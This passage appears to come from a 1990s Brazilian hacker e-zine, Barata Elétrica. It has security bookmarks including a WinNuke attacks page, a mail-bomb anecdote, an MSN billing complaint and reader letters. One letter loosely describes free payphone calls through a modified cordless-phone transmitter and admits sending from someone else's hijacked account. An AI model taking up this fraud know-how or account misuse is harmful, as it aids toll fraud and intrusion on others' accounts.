Isso foi um caso que rolou na Esquina das Listas ha' algum tempo. Alguem
descobriu como usa um mail-bomber e usou para fazer um flood de 900 cartas
para todas as listas acima. Uma amostra de como alguem pode detonar com
toda e qualquer etica... E' o caso basico do individuo que se vai se
ferrar, cedo ou tarde, pelo simples fato que faz algo esperando uma reacao
do mesmo tipo. E acaba sendo pego pelo simples fato de que tem mais de uma
maneira de se esfolar um gato.
ALGUNS LINKS DO MEU BOOKMARK
http://www.trouble.org/ - Dan Farmer Internet Survey Sec
http://www.cs.princeton.edu/sip/pub/spoofing.html - Secure Internet Programming: Web Spoofing: An Internet Con Game
http://www.wired.com/news/technology/story/2615.html - Wired News: DoubleClick Tries to Force Hand into Cookie Jar
http://www.jya.com/whp1.htm - William H. Payne News (contra NSA cifers)
http://jya.com/bis_emoney.html - BIS - Development of E-Money - Oct 96
http://www.counterpane.com/whycrypto.html - Why Cryptography is harder than it looks..
http://www.psionic.com/papers.html - Craig Rowland's Technical Papers - TCPIP covert channels
http://www.packet.com/packet/garfinkel/96/47/index2a.html - Packet: Simson Garfinkel - Technology - ActiveX
http://www.cstp.umkc.edu/personal/bhugh/dicinfo.html - Distributed Internet Crack Info
http://www.cybersnot.com/iebug.html - Internet Explorer Bug
http://web.mit.edu/crioux/www/ie/index.html - Internet Explorer Does it Again
http://dec.dorm.umd.edu/iebug.html - Yet another Internet Explorer
bug: Examples
http://www.webcomics.com/shockwave/ - Shockwave Security Alert
http://jya.com/dfa.htm - Biham/Shamir Differential Fault Analysis of
DES
http://www.cl.cam.ac.uk/users/rja14/tamper.html - Tamper Resistance -
a Cautionary Note
http://www.privacy.org/pi/activities/idcard/ - PRIVACY INTERNATIONAL
- National ID Cards Page
http://www.inch.com/~dna/CIMWelcome.html - Museu de Inteligencia
http://linuxwww.db.erau.edu/NAG/nag.html - The Network
Administrators' Guide Linux
http://electron.phys.dal.ca/nag/ghindex.html - The Network
Administrators' Guide
http://www.osf.org/~loverso/javascript/ - JavaScript Problems I've
Reported
http://Lisa.engelska.se/winnuke/ - Nuked - win nt attacks
http://206.244.69.158/ - MyDesktop.com
http://www.nd.edu/~mchapple/iw/start.html - Information Warfare
http://www.psycom.net/iwar.1.html - Information Warfare, I-War, IW,
C4I, Cyberwar
http://www.seas.gwu.edu/student/reto/infowar/info-
war.html#http://www.seas.gwu.edu/student/reto/papers/ - Information
Warfare - definition
http://www.seas.gwu.edu/seas/instctsp/DOCS/BOOK/book.html - BUILDING
IN BIG BROTHER - book
http://www.ndu.edu/ndu/inss/actpubs/act003/a003cont.html - What is
information warfare?
http://www.rand.org/publications/RRR/RRR.fall95.cyber/ - Information
War and Cyberspace Security
http://www-personal.umd.umich.edu/~nhughes/htmldocs/micro.html -
Microserfs - WIRED 2.01
http://www.netforward.com/poboxes/?fradim - Uma coisa sobre livro
http://www-personal.umd.umich.edu/~nhughes/htmldocs/nsa.html - NSA
Handbook
http://www.webcom.com/~~pinknoiz/coldwar/microwave.html - Microwaves
and Mind Control
http://www.cdsar.af.mil/apj/morris.html - Weapons of Mass
Protection...
http://www.jedefense.com/jed.html/ - Journal of Electronic Defense
http://www.geocities.com/hotsprings/3368 - Lesoes por esforco repetitivo
http://www.aimnet.com/~jnavas - Excelente tutorial sobre modens
http://www.sns-access.com/%7Enetpro/maxmtu.htm - Como aumentar sua
velocidade de carregamento de binarios no netscape e etcs..
----------------------------------------------
URGENTE:
EM VIRTUDE DE UM PROBLEMA COM MINHA CORRESPONDENCIA, NAO PUDE ATUALIZAR A
LISTA DE PESSOAS QUE SE DISPUSERAM A "HOSPEDAR" O BARATA ELETRICA NAS SUAS
WEB PAGES. SOUBE QUE TEM PESSOAS FAZENDO "MIRRORS" E ATE' MESMO FAZENDO
VERSOES HTML DO BE. EU PENSO DA SEGUINTE MANEIRA: OU EU PONHO TODOS OU NAO
PONHO NENHUM NOVO ATE' A PROXIMA EDICAO. PECO DESCULPAS PELA FALTA DE
ATENCAO. DE QUALQUER FORMA, PESSOAS QUE ESTIVEREM INTERESSADAS EM COLOCAR
O URL DE SUAS PAGINAS NO BARATA ELETRICA, DESDE QUE NAO TENHAM COISAS
COMERCIAIS, MANDEM PRA rato.cpd@digicron.com E SUBJECT DO TIPO: "MINHA
PAGINA" COM O URL.
QUANTO AOS QUE ESTAO, POR ALGUMA RAZAO, DOIDOS PARA LER O BE EM HTML,
AGUARDEM QUE NOS PROXIMOS DIAS TA' SAINDO... O 15 JA' TEM VERSAO EM HTML NO
PRELO (falta so' corrigir os acentos e cedilhas, a versao no
http://www.inf.ufsc.br/barata/ nao e' a definitiva)
O TOP_QUARK@GEOCITIES.COM JA' ERA. O HACKER CRACKDOWN SERA' RETOMADO. NAO
ENVIEM MENSAGENS PARA TOP_QUARK PORQUE ELE JA' PERDEU O ACESSO A CONTA
EMAIL DELE NA GEOCITIES. PORQUE? NAO FOI PARANOICO BASTANTE E ESQUECEU A
SENHA. DESCOBRIRAM TAMBEM QUE ELE TINHA TENDENCIAS A PARTICIPAR DISSO E
CORTARAM A CONTA PARA ONDE A SENHA ERA ENVIADA. DESSE JEITO. ISSO TAMBEM
PODE ACONTECER COM VOCE. E O PIOR E' QUE EU AVISEI... ELE CONTINUA A
EXISTIR NA REDE, MAS O EMAIL TOP_QUARK@GEOCITIES NAO EXISTE MAIS.
HA' UMA MONTANHA DE PROJETOS. O DE COLOCAR LINKS DE BRASILEIROS NO BE VAI
FICAR PRO PROXIMO NUMERO. COM O PROBLEMA DO TOP_QUARK, RESOLVI QUE QUALQUER
PROJETO DO BE TEM QUE SER LEVADO EM CONSIDERACAO A LEI DE MURPHY. UM OUTRO
PROJETO E' VISITAR ALGUNS LOCAIS DE ENCONTROS DE HACKERS AQUI NO BRASIL.
TUDO DEPENDENDO DE UMAS COISAS QUE NA ULTIMA HORA PODEM RESOLVER NAO
FUNCIONAR...
+++++++++++++++++++++++++++++++++++++
O DESFECHO DO CASO Do MICROSOFT NETWORK
submeta informatica-jb, www-jb, ciberespaco, internet, solucionatica-jb
Amigos,
Conforme prometido, passo o relato abaixo, de como resolvi, da forma um
pouco CARA, mas DE VEZ, o problema enfrentado (e relatado anteriormente),
na Microsoft Network.
HOJE, o "suporte telefonico" da Microsoft no Brasil, que deu OCUPADO varias
vezes, a seguir, me deixou "PENDURADO"ouvindo uma musiquinha, por varios
minutos, a qual, CERTAMENTE, nao poderia me ajudar.
Ao ser atendido pela, Sra. KELLY (011-8710090 12:20h, HORARIO DE BRASILIA),
me foi dito, pela mesma, que iria checar meu cadastro pelo numero do meu
telefone, aguardei cerca de 15minutos (ligacao INTERURBANA, de Recife para
Sao Paulo) mas, ela NUNCA RETORNOU. A ligacao CAIU, afinal.
Insisti, atraves de OUTRA LIGACAO, mais musiquinha, por cerca de 12
minutos, e o SR. SANDRO, me disse que, INFELIZMENTE, o suporte TECNICO nao
poderia fazer nada, e que eu teria que entrar em contato com a AREA
COMERCIAL, no telefone (011-8225764). Sra Juciane (da area comercial), me
disse que o CANCELAMENTO do "NETWORK", tinha que ser feito nos EUA, no
numero 00-1-813-5791668.
Perguntei se era um NUMERO GRATIS (tipo 0800), mas ela afirmou que "NAO
SABIA INFORMAR".
E preciso se registrar, que TODOS os acima, foram SUPER EDUCADOS (embora,
tambem fossem MUITO BEM TRATADOS POR MIM).
Quando liguei para os Estados Unidos ADIVINHEM: GRAVACAO POR MAIS 12
MINUTOS(LIGACAO INTERNACIONAL).
A exemplo das outras ligacoes (so que agora em INGLES): "sorry, all our
attendants are presently attending other MSN MEMBERS. WE APPRECIATE YOU
PATIENCE. You will be attended by the next available agent".
Perguntava-me: QUANDO?
Esperei uns 10 minutos (EM UMA LIGACAO INTERNACIONAL, REPITO), quando fui,
FINALMENTE, atendido pelo Sr. Oliver, TAMBEM, muito educado, QUE RESOLVEU o
meu problema, DEBITANDO ao meu novo cartao o valor de US$ 281.00 e
ENCERRANDO MINHA CONTA, conforme solicitado por mim.
Eu, obviamente, protestei, pelo fato de NAO TER ACESSADO A REDE, A NAO SER
PARA DOWNLOAD DO PROPRIO SOFTWARE DE ACESSO A ELS, VIA INTERNET, TODAS AS
VARIAS VEZES QUE TIVE QUE REINSTALAR O WIN95, em portugues, no meu
computador, mas como queria EVITAR MAIORES PROBLEMASNO MOMENTO, pedi-lhe
que voce em frente, mas que ME ASSEGURA-SE que a conta seria,
DEFINITIVAMENTE, ENCERRADA .
Vale salientar que ANTES DISSO, o mesmo me falou algumas coisas
interessantes:
1. Nao seria necessario EU ligar para eles, ANTES, CANCELANDO A CONTA?
2. Nao era um pouco TARDE, para eu ligar agora, pleiteando NAO PAGAR (mesmo
apesar de NAO TER USADO?
3. Perguntou-me tambem, se eu EFETIVAMENTE, nao tinha usado a NETWORK, ao
qual respondi, por OBVIAS RAZOES MORAIS, que APENAS FIZ O DOWNLOAD DO
SOFTWARE DE ACESSO, A PROPRIA NETWORK (que para os DESAVISADOS, e feito VIA
MODEM, ligacao INTERNACIONAL, e toda vez que se faz uma reinstalacao do
window95, por qualquer razao tecnica, alem de demorar cerca de 30 minutos,
cada DOWNLOAD).
Ai quem perguntou fui eu: e ELES, nao deveriam, PELO MENOS, passar um email
para o seus usuarios dizendo: "VOCE ESTA SENDO DEBITADO, mas nao esta
usando"? Ou melhor: depois de uns 60 dias, ENCERRAR a conta,
simplesmente?
4. Que a partir de Janeiro, o acesso ao suporte da MSN, nos EUA, em
Espanhol, nao mais existira (eu disse para ele, que EU ate, que poderia
resolver em INGLES, MAS SERIA JUSTO, que a maioria doss brasileiros nao
tivessem
um SUPORTE AQUI???)!!!
Parece-me que, JA QUE COMPREI UM PRODUTO EM PORTUGUES, deveria ter um
suporte "MAIS RAZOAVEL", nao e?
E aqueles, que nao tem acesso a lingua Inglesa, e/ou a ligacoes
INTERURBANAS E INTERNACIONAIS?
E como bem disse um caro amigo: OLHA QUE EU, SEMPRE, QUIZ RESOLVER O
ASSUNTO, SEM DISCUSSAO. Imaginem se eu fosse (COM MUITA RAZAO), brigar
pelos US$ 281.00?
O que seria de mim???
Acho que os DEMAIS usuarios TEM DIREITO A SABER DA MINHA EXPERIENCIA, e por
esta razao, faco este relato, esperando que o mesmo lhes seja util.
Grande abraco,
E v a l d o W.
ex-usuario da The Microsoft Network
ADENDO: SE A MICROSOFT QUISER DIVULGAR ALGUMA NOTA COMENTANDO ACIMA, SAI NO
PROXIMO BE.
Subject: It
BrasLlia, 18 de janeiro de 1997
Caro Derneval,
Aqui no Itama&&Y, houve um debate sobre a censura da internet,
conclus^So: o governo n^So quer controlar a internet no Brasil, quer deixa-
la a solta, o que eles querem controlar s^So os provedores de acesso e
melhorar o sistema de vigilancia telefonica aqui no Brasil principalmete no
Distrito federal, aqui onde os crackers sao os filhos e sobrinhos dos
parlamentares, ele tem acesso a muita informaA^So util, os seus
crackerzinhos vao na telebrasilia(igual a telesp ai) e na embratel e
pegam,mexem remexem nas bibliotecas, sabem como funciona a transmissao de
sinais e ainda eles tem informacoes da policia federal de GRA+A!!!
Alguns sao gentils nao saem vandalizando tudo, so as bbs da vida, H...
aqui as coisas sao assim. Gostei do artigo sobre Phreaker, gostaria de
acrecentar que aqui em brasilia poucos sabotam os telefones azuis, nem
os vermelho nem os de cartao da' muito trabalho, aqui o pessoal que
"Saca" compra um telefone destes sem fio(tipo made in Paraguai) faz uma
adaptac^So( que nao sei como se faz e se viesse a saber nao diria). Coloca
o transmissor no telefone(azul,vermelho ou de cartao) e pronto!
faz-se varias ligacoes e nao se paga, para a companhia telefonica
localizar isto leva trabalho mas tem como , utilizando um scanner de sinais
e um analizador de espectro, mais informacoes voce pode ter sobre como
Shimomura prendeu kevin( O pirata eletronico e o samurai, nao lembro a
editora nem o autor).
So' que tem mais quem saber fazer isso nao faz, e quem faz(tentando
copiar o circuito de uma revistina de eletronica qualquer) e' preso,
"torturado",etc...
Bem ja'vou indo, outra coisa esta conta nao e'minha, e'de um cara
que ja'peguei antes. e se quizer publicar meu e-mail na BE tudo bem, mas
sem colocar minhas indentificacoes do e-mail como nome, endereco, senao e'o
nome do dono da conta que vai ficar sujo e nao eu.
Atenciosamente,
TINNY TOON
---------------------------------------
Subject: Proposta
Bom voce nao me conhece e eu nao te conheco, e espero que voce nao divulgue
este mail. Estou em um projeto governamental, o qual seu objetivo e' manter
a integridade de suas informacoes, ou seja manter informacoes sigilosas do
governo longe de hackers idiotas, gostaria de saber se ha interesse de
participar deste projeto ?
Agradeco desde ja sua atencao.
MD.
RESPOSTA: O que eu acho incrivel e' que o cara nao so' me mandou esta carta
nao criptografada (tudo bem, nao to lendo carta criptografada de ninguem,
atualmente) e ainda por cima de um servidor famoso. Quer dizer, se o cara
e' do governo ou trabalha pro governo, como e' que nao tem conta internet
num gov.br da vida? Se nao e' pra divulgar tambem, porque nao criptografou.
E nem falou em grana.. Por ultimo, todo mundo com um pouco de cerebro sabe
que ninguem trabalha pro governo sem ser concursado. Os que nao sao
concursados trabalham p. uma faccao do governo, que pode ser deputado
fulano de tal, ciclano de tal ou ate' um "Bob Fields" da vida...
---------------------------------------------------
BIBLIOGRAFIA
============
A piada do texto estenografia foi enviada para a lista de piadas-l por
Matheus
O artigo de esteganografia foi baseado em busca pelo Yahoo e Lycos (palavra
chave Steganography) alem de trechos do livro "The Code-breakers" do Khan
O artigo sobre o Mitnick foi tirado da pagina do mesmo (sem permissao) no
http://www.2600.com
Os faqs dos encontros foram tirados do alt.2600
Links e lances do genero estao detalhados em seus respectivos lugares.
A entrevista foi retirada do numero 1 da revista argentina "Virus Report",
hoje extinta.
Para assinar a lista MeuPovo, envie msg
para MAJORDOMO@ACTECH.COM.BR, contendo,na 1a linha da msg, o texto:
SUBSCRIBE MEUPOVO
-----------------------------------------------
